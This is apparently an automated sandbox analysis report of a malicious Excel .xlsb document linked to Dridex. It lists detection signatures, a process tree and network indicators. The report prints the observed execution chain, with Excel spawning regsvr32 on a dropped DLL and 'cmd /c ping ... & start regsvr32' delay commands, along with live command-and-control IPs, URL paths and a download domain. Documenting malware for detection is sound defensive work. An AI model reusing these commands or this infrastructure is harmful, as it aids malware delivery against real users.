Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Documents_13134976_1377491379.xlsb

Overview

General Information

Sample Name:Documents_13134976_1377491379.xlsb
Analysis ID:431937
MD5:276bf3db434b887bb77adca0bd46e130
SHA1:eee2be9136f2c70a28b6ca5289e73e2a38453da2
SHA256:27180043ebeb8f2aa8728c5ee020fb5368be3df4e9008b8f01242bf82d5780ce
Tags:xlsbxlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: BlueMashroom DLL Load
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Creates an autostart registry key pointing to binary in C:\Windows
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Xls With Macro 4.0

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6528 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 6796 cmdline: regsvr32 -s ..\iepfusn.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • regsvr32.exe (PID: 6848 cmdline: -s ..\iepfusn.dll MD5: D78B75FC68247E8A63ACBA846182740E)
        • cmd.exe (PID: 6980 cmdline: cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 7032 cmdline: ping 8.8.7.7 -n 2 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
          • regsvr32.exe (PID: 5712 cmdline: C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR MD5: D78B75FC68247E8A63ACBA846182740E)
            • cmd.exe (PID: 1724 cmdline: cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 1808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • PING.EXE (PID: 6196 cmdline: ping 8.8.7.7 -n 2 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
              • regsvr32.exe (PID: 6356 cmdline: C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG MD5: D78B75FC68247E8A63ACBA846182740E)
                • cmd.exe (PID: 6896 cmdline: cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
                  • conhost.exe (PID: 5680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
                  • PING.EXE (PID: 6092 cmdline: ping 8.8.7.7 -n 2 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
                  • regsvr32.exe (PID: 6824 cmdline: C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB MD5: D78B75FC68247E8A63ACBA846182740E)
  • regsvr32.exe (PID: 6872 cmdline: 'C:\Windows\system32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB MD5: D78B75FC68247E8A63ACBA846182740E)
  • regsvr32.exe (PID: 400 cmdline: 'C:\Windows\system32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB MD5: D78B75FC68247E8A63ACBA846182740E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: BlueMashroom DLL LoadShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG, CommandLine: cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 5712, ProcessCommandLine: cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG, ProcessId: 1724
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -s ..\iepfusn.dll, CommandLine: regsvr32 -s ..\iepfusn.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6528, ProcessCommandLine: regsvr32 -s ..\iepfusn.dll, ProcessId: 6796
    Sigma detected: Regsvr32 AnomalyShow sources
    Source: Process startedAuthor: Florian Roth, oscd.community: Data: Command: C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR, CommandLine: C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6980, ProcessCommandLine: C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR, ProcessId: 5712

    Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: unknownHTTPS traffic detected: 107.180.50.232:443 -> 192.168.2.6:49715 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 18.117.84.120:443 -> 192.168.2.6:49740 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 18.117.84.120:443 -> 192.168.2.6:49747 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 18.117.84.120:443 -> 192.168.2.6:49750 version: TLS 1.2
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696B3714 FindFirstFileExA,
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD69653714 FindFirstFileExA,

    Software Vulnerabilities:

    barindex
    Document exploit detected (creates forbidden files)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\iepfusn.dllJump to behavior
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: rtdsgfe[1].dll.0.drJump to dropped file
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
    Source: global trafficDNS query: name: tpfcu.com
    Source: global trafficTCP traffic: 192.168.2.6:49715 -> 107.180.50.232:443
    Source: global trafficTCP traffic: 192.168.2.6:49715 -> 107.180.50.232:443

    Networking:

    barindex
    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 18.117.84.120:443 -> 192.168.2.6:49740
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 18.117.84.120:443 -> 192.168.2.6:49747
    Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 18.117.84.120:443 -> 192.168.2.6:49750
    Uses ping.exe to check the status of other devices and networksShow sources
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: Joe Sandbox ViewASN Name: MIT-GATEWAYSUS MIT-GATEWAYSUS
    Source: Joe Sandbox ViewJA3 fingerprint: 8916410db85077a5460817142dcbc8de
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownTCP traffic detected without corresponding DNS query: 18.117.84.120
    Source: unknownDNS traffic detected: queries for: tpfcu.com
    Source: regsvr32.exe, 00000019.00000003.540484196.0000000000AAC000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: regsvr32.exe, 00000019.00000003.467970862.0000000000B0D000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
    Source: regsvr32.exe, 00000019.00000003.540484196.0000000000AAC000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.25.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: regsvr32.exe, 00000019.00000003.467970862.0000000000B0D000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?c71b863b5b2fa
    Source: regsvr32.exe, 00000019.00000002.634452908.0000000000A78000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en9
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: regsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmpString found in binary or memory: https://18.117.84.120/
    Source: regsvr32.exe, 00000019.00000002.634433415.0000000000A6E000.00000004.00000020.sdmpString found in binary or memory: https://18.117.84.120/#
    Source: regsvr32.exe, 00000019.00000002.636067995.00000000029E5000.00000004.00000001.sdmpString found in binary or memory: https://18.117.84.120/18.188.86.8/
    Source: regsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmpString found in binary or memory: https://18.117.84.120/89b
    Source: regsvr32.exe, 00000019.00000002.634433415.0000000000A6E000.00000004.00000020.sdmp, regsvr32.exe, 00000019.00000002.634483097.0000000000A9A000.00000004.00000020.sdmpString found in binary or memory: https://18.117.84.120/kenichi/special21new/trailer2a5
    Source: regsvr32.exe, 00000019.00000002.634500391.0000000000AAC000.00000004.00000020.sdmpString found in binary or memory: https://18.117.84.120/kenichi/special21new/trailer2a5T0
    Source: regsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmpString found in binary or memory: https://18.188.86.8/
    Source: regsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmpString found in binary or memory: https://18.188.86.8/Z
    Source: regsvr32.exe, 00000019.00000002.634500391.0000000000AAC000.00000004.00000020.sdmpString found in binary or memory: https://18.188.86.8/kenichi/special21new/trailer2a5
    Source: regsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmpString found in binary or memory: https://18.188.86.8/railer2a55b
    Source: regsvr32.exe, 00000019.00000002.636079030.0000000002A44000.00000004.00000001.sdmpString found in binary or memory: https://18.188.86.8:443/kenichi/special21new/trailer2a55
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.cortana.ai
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.office.net
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.onedrive.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://augloop.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://cdn.entity.
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://cortana.ai
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://cortana.ai/api
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://cr.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://dev.cortana.ai
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://directory.services.
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://graph.windows.net
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://graph.windows.net/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://login.windows.local
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://management.azure.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://management.azure.com/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://messaging.office.com/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://ncus.contentsync.
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://officeapps.live.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://onedrive.live.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
